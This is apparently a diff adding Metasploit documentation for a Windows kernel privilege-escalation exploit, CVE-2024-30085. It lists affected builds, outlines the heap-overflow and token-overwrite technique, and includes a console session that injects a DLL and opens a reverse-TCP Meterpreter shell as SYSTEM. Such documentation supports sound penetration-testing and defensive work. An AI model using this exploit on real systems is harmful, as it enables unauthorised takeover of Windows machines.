|
| 1 | +## Vulnerable Application |
| 2 | +As of the writing of this documentaiton, NIST claims on https://nvd.nist.gov/vuln/detail/cve-2024-30085 that the |
| 3 | +following versions of Windows are vulnerable: |
| 4 | +``` |
| 5 | +cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:* |
| 6 | +Up to (excluding) 10.0.17763.5936 |
| 7 | +
|
| 8 | +cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* |
| 9 | +Up to (excluding) 10.0.19044.4529 |
| 10 | +
|
| 11 | +cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* |
| 12 | +Up to (excluding) 10.0.19045.4529 |
| 13 | +
|
| 14 | +cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:*:* |
| 15 | +Up to (excluding) 10.0.22000.3019 |
| 16 | +
|
| 17 | +cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:* |
| 18 | +Up to (excluding) 10.0.22621.3737 |
| 19 | +
|
| 20 | +cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* |
| 21 | +Up to (excluding) 10.0.22631.3737 |
| 22 | +
|
| 23 | +cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:* |
| 24 | +Up to (excluding) 10.0.17763.5936 |
| 25 | +
|
| 26 | +cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:* |
| 27 | +Up to (excluding) 10.0.20348.2522 |
| 28 | +
|
| 29 | +cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:* |
| 30 | +Up to (excluding) 10.0.25398.950 |
| 31 | +``` |
| 32 | + |
| 33 | +In practice, this exploit did not work on Windows 10_1809, but does appear to work on Windows 10_2004, 10_20H2, and |
| 34 | +10_21H1 as well as the remaining vulnerable versions listed by NIST. |
| 35 | + |
| 36 | +CVE-2024-30085 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10, |
| 37 | +Windows 11 and Windows Server 2022. |
| 38 | + |
| 39 | +The vulnerability is a heap overflow in the Cloud Files Mini Filter Driver, a driver that facilitates |
| 40 | +management and synchronization of files between a local host and a remote server. Under certain specific |
| 41 | +circumstances, the application will not perform a check of the size when updating a file in local memory, |
| 42 | +allowing a heap overflow. |
| 43 | +By overflowing and corrupting _WNF_STATE_DATA objects, we can leak the location of the ALPC handle table and again |
| 44 | +to leak a PipeAttribute object. The PipeAttribute object then allows us to leak the location of the system process |
| 45 | +token and overwrite own on token with it. |
| 46 | +If this exploit fails, it will not work again until the target reboots. |
| 47 | + |
| 48 | +### Setup |
| 49 | + |
| 50 | +Windows 10 2004 to Windows 11 23H2 and Server 2022 through server 23H2 are vulnerable. |
| 51 | +This exploit module has been tested on Windows 10 2004 through Windows 11 23H2 10.0.22631.2428 and Server 2022 |
| 52 | +10.0.20348.169 |
| 53 | + |
| 54 | +## Verification Steps |
| 55 | + |
| 56 | +1. Start msfconsole |
| 57 | +1. Get a user level session on an affected Windows machine |
| 58 | +1. Do: `windows/local/cve_2024_30085_cloud_files` |
| 59 | +1. Set the `LHOST`, `LPORT`, and `SESSION` options |
| 60 | +1. Run the module |
| 61 | +1. Receive a session running in the context of the `NT AUTHORITY\SYSTEM` user. |
| 62 | + |
| 63 | +## Scenarios |
| 64 | +### Windows 11 (10.0 Build 22631.2428) |
| 65 | +``` |
| 66 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > show options |
| 67 | +
|
| 68 | +Module options (exploit/windows/local/cve_2024_30085_cloud_files): |
| 69 | +
|
| 70 | + Name Current Setting Required Description |
| 71 | + ---- --------------- -------- ----------- |
| 72 | + SESSION 3 yes The session to run this module on |
| 73 | +
|
| 74 | +
|
| 75 | +Payload options (windows/x64/meterpreter/reverse_tcp): |
| 76 | +
|
| 77 | + Name Current Setting Required Description |
| 78 | + ---- --------------- -------- ----------- |
| 79 | + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) |
| 80 | + LHOST 10.5.135.201 yes The listen address (an interface may be specified) |
| 81 | + LPORT 4545 yes The listen port |
| 82 | +
|
| 83 | +
|
| 84 | +Exploit target: |
| 85 | +
|
| 86 | + Id Name |
| 87 | + -- ---- |
| 88 | + 0 Windows x64 |
| 89 | +
|
| 90 | +
|
| 91 | +
|
| 92 | +View the full module info with the info, or info -d command. |
| 93 | +
|
| 94 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > set session 5 |
| 95 | +session => 5 |
| 96 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > run |
| 97 | +[*] Started reverse TCP handler on 10.5.135.201:4545 |
| 98 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 99 | +[*] OS version: Windows 11 version 23H2 |
| 100 | +[+] The target appears to be vulnerable. |
| 101 | +[*] Launching notepad to host the exploit... |
| 102 | +[*] The notepad path is: C:\Windows\System32\notepad.exe |
| 103 | +[*] The notepad pid is: 4152 |
| 104 | +[*] Reflectively injecting the DLL into 4152... |
| 105 | +[*] Sending stage (203846 bytes) to 10.5.132.111 |
| 106 | +[*] Meterpreter session 6 opened (10.5.135.201:4545 -> 10.5.132.111:49800) at 2025-03-06 16:19:44 -0600 |
| 107 | +
|
| 108 | +meterpreter > sysinfo |
| 109 | +Computer : WIN11_23H2_8EA9 |
| 110 | +OS : Windows 11 (10.0 Build 22631). |
| 111 | +Architecture : x64 |
| 112 | +System Language : en_US |
| 113 | +Domain : WORKGROUP |
| 114 | +Logged On Users : 2 |
| 115 | +Meterpreter : x64/windows |
| 116 | +meterpreter > getuid |
| 117 | +Server username: NT AUTHORITY\SYSTEM |
| 118 | +``` |
0 commit comments